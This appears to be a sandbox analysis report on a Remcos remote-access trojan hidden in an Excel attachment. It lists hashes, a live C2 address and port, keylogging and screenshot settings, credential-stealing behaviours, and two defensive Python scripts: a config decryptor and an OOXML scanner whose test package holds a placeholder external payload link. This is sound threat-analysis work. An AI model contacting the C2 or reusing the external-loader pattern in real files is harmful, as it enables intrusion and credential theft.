General

  • Target

    New Order.xla.xlsx

  • Size

    239KB

  • Sample

    240430-gek1xaec8x

  • MD5

    c6fcd4edb55b0d97854fb0ef475ecbdf

  • SHA1

    6bf1aa4de0ba70680525b55162a18a1eafe0d62c

  • SHA256

    0e07267ac23262005fdd2103b99b2977a6f3212c8489ceed4c148f8012ca67d1

  • SHA512

    f82aab889fec106e9e6a0386a6f9541782580d9998a6dcec576ec820718ccd41df001e7fac2de14b3f832920e733afec167c87d01228efff7786f898b43a5268

  • SSDEEP

    6144:qd4UcLe0JOqPQZR8MDdATCR3tSv0W8RU46zpDFSY:NUP/qPQZR8MxAm/S8W8+9p4Y

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5
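
The attribute list above is what a config extractor emits after decrypting the RAT's embedded settings. As an added example (not code from the sandbox or from the Remcos author), the script below implements the decryption layout reported in public analyses of Remcos 3.x/4.x: the `SETTINGS` resource starts with a one-byte key length, followed by the RC4 key, followed by the RC4-encrypted configuration, whose fields are separated by `|\x1e\x1e\x1f|`. That layout, the field delimiter, and the field order used in `build_sample_blob` (hosts, botnet id, mutex) are assumptions to verify against your own sample; the blob itself is constructed here from the C2, botnet and mutex values shown in the report.

```python
"""Decrypt a Remcos-style SETTINGS blob and split it into config fields."""
import sys
from typing import List, Tuple

# Field delimiter seen in Remcos v3+/v4 configs (assumption based on public
# analyses; older builds use a different separator).
DELIM = b"|\x1e\x1e\x1f|"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_settings(blob: bytes) -> bytes:
    """Layout assumed: [key_len:1][key:key_len][rc4(key, config)].

    Raises on an empty or truncated blob instead of returning garbage.
    """
    if not blob:
        raise ValueError("empty SETTINGS blob")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError("bad key length %d for %d-byte blob" % (key_len, len(blob)))
    key = blob[1:1 + key_len]
    return rc4(key, blob[1 + key_len:])


def parse_fields(plain: bytes) -> List[str]:
    """Split decrypted config into fields; latin-1 keeps stray bytes printable."""
    return [f.decode("latin-1") for f in plain.split(DELIM)]


def extract_c2(fields: List[str]) -> List[Tuple[str, int]]:
    """Field 0 holds ';'-separated host:port:password entries (assumption)."""
    hosts = []
    for entry in fields[0].split(";"):
        if not entry:
            continue
        parts = entry.split(":")
        if len(parts) < 2 or not parts[1].isdigit():
            continue  # malformed entry; skip rather than abort
        hosts.append((parts[0], int(parts[1])))
    return hosts


def build_sample_blob(key: bytes = b"k3y") -> bytes:
    """Constructed test blob using values from the report; NOT the real resource.
    Field order (hosts, botnet id, mutex) is an assumption for the example."""
    fields = [b"107.172.31.178:2404:1", b"RemoteHost", b"Rmc-NVSJ5U"]
    return bytes([len(key)]) + key + rc4(key, DELIM.join(fields))


if __name__ == "__main__":
    # Usage: python remcos_cfg.py SETTINGS.bin   (or no args to run on the sample)
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blob()
    cfg = parse_fields(decrypt_settings(raw))
    print("C2:", extract_c2(cfg))
    for idx, value in enumerate(cfg):
        print("field[%d] = %r" % (idx, value))
```

To run it on a real sample, dump the `SETTINGS` resource with a PE resource tool first and pass the file as the argument; if the split yields one giant field, the delimiter assumption is wrong for that build and should be adjusted.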

Targets

    • Target

      New Order.xla.xlsx

    • Remcos

      Remcos is closed-source remote control and surveillance software that is widely abused as a remote-access trojan.

    • NirSoft MailPassView

      Password recovery tool for various email clients

    • NirSoft WebBrowserPassView

      Password recovery tool for various web browsers

    • Nirsoft

    • Blocklisted process makes network request

    • Abuses OpenXML format to download file from external location

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials.

    • Accesses Microsoft Outlook accounts

    • Adds Run key to start application

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext
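
The "Abuses OpenXML format to download file from external location" signature fires when a relationship inside the OOXML package points outside the file. As an added example, not code from the sandbox or from the report, the scanner below walks every `*.rels` part in an xlsx/docx zip and reports relationships whose `TargetMode` is `External`, then flags the types that load content on open (OLE objects, attached templates, frames) as opposed to ordinary hyperlinks. The package it scans by default is constructed in `build_sample_package` for the example; the relationship type URIs are the standard OOXML ones, and `example.invalid` is a placeholder, not an indicator from this sample.

```python
"""Find external-location relationships in an OOXML (xlsx/docx/pptx) package."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types that make Office fetch and load the target on open.
LOADER_TYPE_SUFFIXES = ("/oleObject", "/attachedTemplate", "/frame", "/subDocument")


def external_relationships(data: bytes) -> List[Tuple[str, str, str]]:
    """Return (rels_part, relationship_type, target) for each External relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed rels part: skip it, but keep scanning the rest
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    hits.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return hits


def is_suspicious(rel_type: str, target: str) -> bool:
    """Loader-type relationships, or file:/UNC targets, warrant a closer look;
    a plain hyperlink to a web page does not by itself."""
    t = target.lower()
    return rel_type.endswith(LOADER_TYPE_SUFFIXES) or t.startswith(("file:", "\\\\"))


def build_sample_package(external_target: Optional[str]) -> bytes:
    """Construct a minimal xlsx-like package for the example (not the report's sample).
    When external_target is given, the workbook rels carry an External oleObject."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels",
                    '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sofficeDocument" '
                    'Target="xl/workbook.xml"/></Relationships>' % (REL_NS, OFFICE_REL))
        rels = ['<Relationship Id="rId1" Type="%sworksheet" Target="worksheets/sheet1.xml"/>'
                % OFFICE_REL]
        if external_target:
            rels.append('<Relationship Id="rId2" Type="%soleObject" Target="%s" '
                        'TargetMode="External"/>' % (OFFICE_REL, external_target))
        zf.writestr("xl/_rels/workbook.xml.rels",
                    '<Relationships xmlns="%s">%s</Relationships>' % (REL_NS, "".join(rels)))
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python ooxml_external.py suspicious.xlsx   (no args: scan the built sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else \
        build_sample_package("http://example.invalid/payload.doc")
    for part, rel_type, target in external_relationships(data):
        flag = "SUSPICIOUS" if is_suspicious(rel_type, target) else "external"
        print("%s  %s  %s -> %s" % (flag, part, rel_type.rsplit("/", 1)[-1], target))
```

A double extension such as `.xla.xlsx` does not change how the package is parsed; the scan is the same for any zip-based Office document, and a hit in `xl/embeddings` or `word/_rels` is checked the same way.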

MITRE ATT&CK Enterprise v15
